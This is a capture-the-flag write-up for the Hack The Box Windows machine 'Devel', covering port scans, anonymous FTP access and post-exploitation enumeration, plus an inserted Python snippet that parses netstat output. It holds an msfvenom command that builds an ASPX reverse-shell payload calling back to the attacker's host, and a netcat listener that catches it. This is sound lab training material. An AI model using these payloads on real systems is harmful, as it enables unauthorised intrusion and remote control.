Hack The Box - Devel
September 11, 2019
Box Details

| OS | DIFFICULTY | POINTS |
|---|---|---|
| Windows | EASY | 20 |
ENUMERATION
Initial Port Scanning
masscan
COMMAND
masscan -p1-65535,U:1-65535 10.10.10.5 --rate=1000 -e tun0 -oG masscan-Blue
RESULT
# Masscan 1.0.5 scan initiated Tue Sep 10 14:08:54 2019
# Ports scanned: TCP(65535;1-65535,) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.10.10.5 () Ports: 80/open/tcp////
Host: 10.10.10.5 () Ports: 21/open/tcp////
# Masscan done at Tue Sep 10 14:12:36 2019
nmap
Ports for nmap scanning:
- 80
- 21
COMMAND
nmap -sC -sV -p80,21 -oA nmap-Devel 10.10.10.5
RESULT
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-10 15:13 BST
Nmap scan report for 10.10.10.5
Host is up (0.039s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 02:06AM <DIR> aspnet_client
| 03-17-17 05:37PM 689 iisstart.htm
|_03-17-17 05:37PM 184946 welcome.png
| ftp-syst:
|_ SYST: Windows_NT
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.54 seconds
Discovery
FTP
COMMAND
ftp 10.10.10.5
RESULT
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: <password>
230 User logged in.
Remote system type is Windows_NT.
ftp>
EXPLOITS
Exploit Search
COMMAND
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.10 LPORT=8515 -f aspx > revshell.aspx
NOTE: Because we are going to use netcat to listen for the reverse shell, we must use the payload windows/shell_reverse_tcp and not windows/shell/reverse_tcp; i.e. the stageless version.
RESULT
# nc -lvvp 8515
listening on [any] 8515 ...
10.10.10.5: inverse host lookup failed: Unknown host
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.5] 49166
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\windows\system32\inetsrv>whoami
whoami
iis apppool\web
POST EXPLOIT DISCOVERY
System Information
c:\windows\system32\inetsrv>systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: babis
Registered Organization:
Product ID: 55041-051-0948536-86302
Original Install Date: 17/3/2017, 4:17:31
System Boot Time: 13/9/2019, 5:50:51
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: el;Greek
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul
Total Physical Memory: 1.023 MB
Available Physical Memory: 804 MB
Virtual Memory: Max Size: 2.047 MB
Virtual Memory: Available: 1.542 MB
Virtual Memory: In Use: 505 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.5
Hostname
c:\windows\system32\inetsrv>hostname
hostname
devel
Users
c:\windows\system32\inetsrv>echo %username%
echo %username%
DEVEL$
c:\windows\system32\inetsrv>net users
net users
User accounts for \\
-------------------------------------------------------------------------------
Administrator babis Guest
The command completed with one or more errors.
Network Information
c:\windows\system32\inetsrv>ipconfig /all
ipconfig /all
Windows IP Configuration
Host Name . . . . . . . . . . . . : devel
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Intel(R) PRO/1000 MT Network Connection
Physical Address. . . . . . . . . : 00-50-56-B9-C8-4B
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
IPv4 Address. . . . . . . . . . . : 10.10.10.5(Preferred)
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.10.10.2
DNS Servers . . . . . . . . . . . : 10.10.10.2
8.8.8.8
NetBIOS over Tcpip. . . . . . . . : Enabled
Tunnel adapter isatap.{024DBC4C-1BA9-4DFC-8341-2C35AB1DF869}:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Microsoft ISATAP Adapter
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
Tunnel adapter Local Area Connection* 9:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . :
Description . . . . . . . . . . . : Teredo Tunneling Pseudo-Interface
Physical Address. . . . . . . . . : 00-00-00-00-00-00-00-E0
DHCP Enabled. . . . . . . . . . . : No
Autoconfiguration Enabled . . . . : Yes
c:\windows\system32\inetsrv>route print
route print
===========================================================================
Interface List
11...00 50 56 b9 c8 4b ......Intel(R) PRO/1000 MT Network Connection
1...........................Software Loopback Interface 1
12...00 00 00 00 00 00 00 e0 Microsoft ISATAP Adapter
13...00 00 00 00 00 00 00 e0 Teredo Tunneling Pseudo-Interface
===========================================================================
IPv4 Route Table
===========================================================================
Active Routes:
Network Destination Netmask Gateway Interface Metric
0.0.0.0 0.0.0.0 10.10.10.2 10.10.10.5 266
10.10.10.0 255.255.255.0 On-link 10.10.10.5 266
10.10.10.5 255.255.255.255 On-link 10.10.10.5 266
10.10.10.255 255.255.255.255 On-link 10.10.10.5 266
127.0.0.0 255.0.0.0 On-link 127.0.0.1 306
127.0.0.1 255.255.255.255 On-link 127.0.0.1 306
127.255.255.255 255.255.255.255 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 127.0.0.1 306
224.0.0.0 240.0.0.0 On-link 10.10.10.5 266
255.255.255.255 255.255.255.255 On-link 127.0.0.1 306
255.255.255.255 255.255.255.255 On-link 10.10.10.5 266
===========================================================================
Persistent Routes:
Network Address Netmask Gateway Address Metric
0.0.0.0 0.0.0.0 10.10.10.2 Default
===========================================================================
IPv6 Route Table
===========================================================================
Active Routes:
If Metric Network Destination Gateway
1 306 ::1/128 On-link
1 306 ff00::/8 On-link
===========================================================================
Persistent Routes:
None
c:\windows\system32\inetsrv>arp -A
arp -A
Interface: 10.10.10.5 --- 0xb
Internet Address Physical Address Type
10.10.10.2 00-50-56-b9-c8-cd dynamic
10.10.10.255 ff-ff-ff-ff-ff-ff static
224.0.0.22 01-00-5e-00-00-16 static
224.0.0.252 01-00-5e-00-00-fc static
c:\windows\system32\inetsrv>netstat -ano
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 1424
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 384
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 724
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 888
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 488
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 496
TCP 10.10.10.5:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.5:49166 10.10.14.10:8515 ESTABLISHED 3228
TCP [::]:21 [::]:0 LISTENING 1424
TCP [::]:80 [::]:0 LISTENING 4
TCP [::]:135 [::]:0 LISTENING 672
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:5357 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 384
TCP [::]:49153 [::]:0 LISTENING 724
TCP [::]:49154 [::]:0 LISTENING 888
TCP [::]:49155 [::]:0 LISTENING 488
TCP [::]:49156 [::]:0 LISTENING 496
UDP 0.0.0.0:123 *:* 1000
UDP 0.0.0.0:3702 *:* 1392
UDP 0.0.0.0:3702 *:* 1392
UDP 0.0.0.0:5355 *:* 1072
UDP 0.0.0.0:52626 *:* 1392
UDP 10.10.10.5:137 *:* 4
UDP 10.10.10.5:138 *:* 4
UDP [::]:123 *:* 1000
UDP [::]:3702 *:* 1392
UDP [::]:3702 *:* 1392
UDP [::]:52627 *:* 1392
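As an added example (not part of the original write-up), the `netstat -ano` output above can be triaged offline to answer two review questions: which TCP listeners exist on the host but were not reported open by the masscan run, and which established sessions the host itself initiated. The sample is an excerpt of the rows shown above; the function names are illustrative, and treating "local port is not a listening port" as host-initiated is a heuristic.

```python
import ipaddress
import re
from collections import defaultdict

# Excerpt of the `netstat -ano` rows shown above (single-space separated,
# as they appear on the page).
NETSTAT = """\
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:21 0.0.0.0:0 LISTENING 1424
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 672
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:5357 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 384
TCP 10.10.10.5:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.5:49166 10.10.14.10:8515 ESTABLISHED 3228
TCP [::]:21 [::]:0 LISTENING 1424
TCP [::]:80 [::]:0 LISTENING 4
UDP 0.0.0.0:123 *:* 1000
UDP 10.10.10.5:137 *:* 4
"""

# TCP ports the masscan run earlier on the page reported as open.
EXTERNALLY_OPEN = {21, 80}

# UDP rows have no State column, so the state group is optional.
ROW = re.compile(
    r"^(?P<proto>TCP|UDP)\s+(?P<local>\S+)\s+(?P<remote>\S+)"
    r"(?:\s+(?P<state>[A-Z][A-Z_0-9]*))?\s+(?P<pid>\d+)$"
)


def split_endpoint(endpoint):
    """Split 'addr:port' (IPv4, '[v6]:port' or '*:*') into (addr, port or None)."""
    host, _, port = endpoint.rpartition(":")
    return host.strip("[]"), (int(port) if port.isdigit() else None)


def parse_netstat(text):
    """Return one dict per connection row; headers and blank lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line.strip())
        if not m:
            continue
        lhost, lport = split_endpoint(m["local"])
        rhost, rport = split_endpoint(m["remote"])
        rows.append({
            "proto": m["proto"], "state": m["state"], "pid": int(m["pid"]),
            "local": m["local"], "remote": m["remote"],
            "lhost": lhost, "lport": lport, "rhost": rhost, "rport": rport,
        })
    return rows


def listeners_not_seen_externally(rows, external_ports):
    """Map TCP listening port -> sorted PIDs for ports absent from the external scan."""
    by_port = defaultdict(set)
    for r in rows:
        if r["proto"] == "TCP" and r["state"] == "LISTENING":
            if r["lport"] not in external_ports:
                by_port[r["lport"]].add(r["pid"])
    return {port: sorted(pids) for port, pids in sorted(by_port.items())}


def outbound_sessions(rows):
    """ESTABLISHED TCP sessions whose local port is not one of the host's listeners.

    Heuristic: if the local side is not a listening port, the host was the
    client. Loopback peers are ignored.
    """
    listening = {r["lport"] for r in rows
                 if r["proto"] == "TCP" and r["state"] == "LISTENING"}
    found = []
    for r in rows:
        if r["proto"] != "TCP" or r["state"] != "ESTABLISHED":
            continue
        if r["lport"] in listening:
            continue
        try:
            if ipaddress.ip_address(r["rhost"]).is_loopback:
                continue
        except ValueError:
            continue  # unparsable peer address, nothing to report
        found.append((r["pid"], r["local"], r["remote"]))
    return found


if __name__ == "__main__":
    parsed = parse_netstat(NETSTAT)
    for port, pids in listeners_not_seen_externally(parsed, EXTERNALLY_OPEN).items():
        print(f"listening but not in external scan: tcp/{port} (PID {pids})")
    for pid, local, remote in outbound_sessions(parsed):
        print(f"host-initiated session: PID {pid} {local} -> {remote}")
```

On this host the only host-initiated session is PID 3228 connecting to 10.10.14.10:8515, which is the netcat listener from the earlier step.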
c:\windows\system32\inetsrv>netsh firewall show state
netsh firewall show state
Firewall status:
-------------------------------------------------------------------
Profile = Standard
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Group policy version = Windows Firewall
Remote admin mode = Disable
Ports currently open on all network interfaces:
Port Protocol Version Program
-------------------------------------------------------------------
No ports are currently open on all network interfaces.
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
c:\windows\system32\inetsrv> netsh firewall show config
netsh firewall show config
Domain profile configuration:
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Allowed programs configuration for Domain profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Domain profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Domain profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Standard profile configuration (current):
-------------------------------------------------------------------
Operational mode = Enable
Exception mode = Enable
Multicast/broadcast response mode = Enable
Notification mode = Enable
Service configuration for Standard profile:
Mode Customized Name
-------------------------------------------------------------------
Enable No Network Discovery
Allowed programs configuration for Standard profile:
Mode Traffic direction Name / Program
-------------------------------------------------------------------
Port configuration for Standard profile:
Port Protocol Mode Traffic direction Name
-------------------------------------------------------------------
ICMP configuration for Standard profile:
Mode Type Description
-------------------------------------------------------------------
Enable 2 Allow outbound packet too big
Log configuration:
-------------------------------------------------------------------
File location = C:\Windows\system32\LogFiles\Firewall\pfirewall.log
Max file size = 4096 KB
Dropped packets = Disable
Connections = Disable
IMPORTANT: Command executed successfully.
However, "netsh firewall" is deprecated;
use "netsh advfirewall firewall" instead.
For more information on using "netsh advfirewall firewall" commands
instead of "netsh firewall", see KB article 947709
at http://go.microsoft.com/fwlink/?linkid=121488 .
Investigate Running Services
c:\windows\system32\inetsrv>schtasks /query /fo LIST /v
schtasks /query /fo LIST /v
Folder: \
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows
INFO: There are no scheduled tasks presently available at your access level.
Folder: \Microsoft\Windows\Active Directory Rights Management Services Client
HostName: DEVEL
TaskName: \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Everyone
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 3:00:00
Start Date: 9/11/2006
End Date: N/A
Days: Every 1 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Automated)
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if authentication to the template distribution web service on the server fails. In this case, it fails silently.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Everyone
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Active Directory Rights Management Services Client\AD RMS Rights Policy Template Management (Manual)
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: Updates the AD RMS rights policy templates for the user. This job provides a credential prompt if authentication to the template distribution web service on the server fails.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Everyone
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 01:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Autochk
HostName: DEVEL
TaskName: \Microsoft\Windows\Autochk\Proxy
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:21:07
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe /d acproxy.dll,PerformAutochkOperations
Start In: N/A
Comment: This task collects and uploads autochk SQM data if opted-in to the Microsoft Customer Experience Improvement Program.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 525600 minutes
Power Management:
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At system start up
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Customer Experience Improvement Program
HostName: DEVEL
TaskName: \Microsoft\Windows\Customer Experience Improvement Program\Consolidator
Next Run Time: 14/9/2019 8:00:00
Status: Could not start
Logon Mode: Interactive/Background
Last Run Time: 14/9/2019 2:00:00
Last Result: -2147479295
Author: Microsoft Corporation
Task To Run: %SystemRoot%\System32\wsqmcons.exe
Start In: N/A
Comment: If the user has consented to participate in the Windows Customer Experience Improvement Program, this job collects and sends usage data to Microsoft.
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: One Time Only, Hourly
Start Time: 12:00:00
Start Date: 2/1/2004
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: 19 Hour(s), 0 Minute(s)
Repeat: Until: Time: None
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Customer Experience Improvement Program\KernelCeipTask
Next Run Time: 19/9/2019 3:30:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: The Kernel CEIP (Customer Experience Improvement Program) task collects additional information about the system and sends this data to Microsoft. If the user has not consented to participate in Windows CEIP, this task does nothing.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 3 minutes, If Not Idle Retry For 1020 minutes
Power Management: No Start On Batteries
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 3:30:00
Start Date: 1/9/2008
End Date: N/A
Days: THU
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\Customer Experience Improvement Program\UsbCeip
Next Run Time: 16/9/2019 1:30:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 5:57:06
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: The USB CEIP (Customer Experience Improvement Program) task collects Universal Serial Bus related statistics and information about your machine and sends it to the Windows Device Connectivity engineering group at Microsoft. The information received is
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: LOCAL SERVICE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Daily
Start Time: 1:30:00
Start Date: 25/4/2008
End Date: N/A
Days: Every 3 day(s)
Months: N/A
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Defrag
HostName: DEVEL
TaskName: \Microsoft\Windows\Defrag\ScheduledDefrag
Next Run Time: 18/9/2019 1:38:42
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 6:08:36
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\defrag.exe -c
Start In: N/A
Comment: This task defragments the computers hard disk drives.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 3 minutes, If Not Idle Retry For 10080 minutes Stop the task if Idle State end
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2005
End Date: N/A
Days: WED
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Diagnosis
HostName: DEVEL
TaskName: \Microsoft\Windows\Diagnosis\Scheduled
Next Run Time: 15/9/2019 1:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 17/3/2017 5:45:40
Last Result: 0
Author: Microsoft Corporation
Task To Run: COM handler
Start In: N/A
Comment: The Windows Scheduled Maintenance Task performs periodic maintenance of the computer system by fixing problems automatically or reporting them through the Action Center.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for 10 minutes, If Not Idle Retry For 480 minutes
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: INTERACTIVE
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2004
End Date: N/A
Days: SUN
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\DiskDiagnostic
HostName: DEVEL
TaskName: \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticDataCollector
Next Run Time: 22/9/2019 1:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 13/9/2019 5:57:06
Last Result: 0
Author: Microsoft Corporation
Task To Run: %windir%\system32\rundll32.exe dfdts.dll,DfdGetDefaultPolicyAndSMART
Start In: N/A
Comment: The Windows Disk Diagnostic reports general disk and system information to Microsoft for users participating in the Customer Experience Program.
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for minutes, If Not Idle Retry For minutes
Power Management: No Start On Batteries
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2004
End Date: N/A
Days: SUN
Months: Every 2 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
HostName: DEVEL
TaskName: \Microsoft\Windows\DiskDiagnostic\Microsoft-Windows-DiskDiagnosticResolver
Next Run Time: Disabled
Status:
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: Microsoft Corporation
Task To Run: %windir%\system32\DFDWiz.exe
Start In: N/A
Comment: The Microsoft-Windows-DiskDiagnosticResolver warns users about faults reported by hard disks that support the Self Monitoring and Reporting Technology (S.M.A.R.T.) standard. This task is triggered automatically by the Diagnostic Policy Service when a S.
Scheduled Task State: Disabled
Idle Time: Disabled
Power Management:
Run As User: Users
Delete Task If Not Rescheduled: Disabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: At logon time
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Location
HostName: DEVEL
TaskName: \Microsoft\Windows\Location\Notifications
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %windir%\System32\LocationNotifications.exe
Start In: N/A
Comment: Location Activity
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: Authenticated Users
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: When an event occurs
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
Folder: \Microsoft\Windows\Maintenance
HostName: DEVEL
TaskName: \Microsoft\Windows\Maintenance\WinSAT
Next Run Time: 15/9/2019 1:00:00
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: 17/3/2017 11:49:04
Last Result: 0
Author: Microsoft
Task To Run: COM handler
Start In: N/A
Comment: Measures a system's performance and capabilities
Scheduled Task State: Enabled
Idle Time: Only Start If Idle for minutes, If Not Idle Retry For minutes Stop the task if Idle State end
Power Management: Stop On Battery Mode, No Start On Batteries
Run As User: Administrators
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: Disabled
Schedule: Scheduling data is not available in this format.
Schedule Type: Weekly
Start Time: 1:00:00
Start Date: 1/1/2008
End Date: N/A
Days: SUN
Months: Every 1 week(s)
Repeat: Every: Disabled
Repeat: Until: Time: Disabled
Repeat: Until: Duration: Disabled
Repeat: Stop If Still Running: Disabled
Folder: \Microsoft\Windows\Media Center
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ActivateWindowsSearch
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoActivateWindowsSearch
Start In: N/A
Comment: Privileged Media Center Search Reindexing job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\ConfigureInternetTimeService
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoConfigureInternetTimeService
Start In: N/A
Comment: Privileged Media Center Time Update Service setting job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
Repeat: Until: Duration: N/A
Repeat: Stop If Still Running: N/A
HostName: DEVEL
TaskName: \Microsoft\Windows\Media Center\DispatchRecoveryTasks
Next Run Time: N/A
Status: Ready
Logon Mode: Interactive/Background
Last Run Time: N/A
Last Result: 1
Author: N/A
Task To Run: %SystemRoot%\ehome\ehPrivJob.exe /DoRecoveryTasks $(Arg0)
Start In: N/A
Comment: Privileged Media Center Recovery Task Dispatcher job
Scheduled Task State: Enabled
Idle Time: Disabled
Power Management:
Run As User: SYSTEM
Delete Task If Not Rescheduled: Enabled
Stop Task If Runs X Hours and X Mins: 72:00:00
Schedule: Scheduling data is not available in this format.
Schedule Type: On demand only
Start Time: N/A
Start Date: N/A
End Date: N/A
Days: N/A
Months: N/A
Repeat: Every: N/A
Repeat: Until: Time: N/A
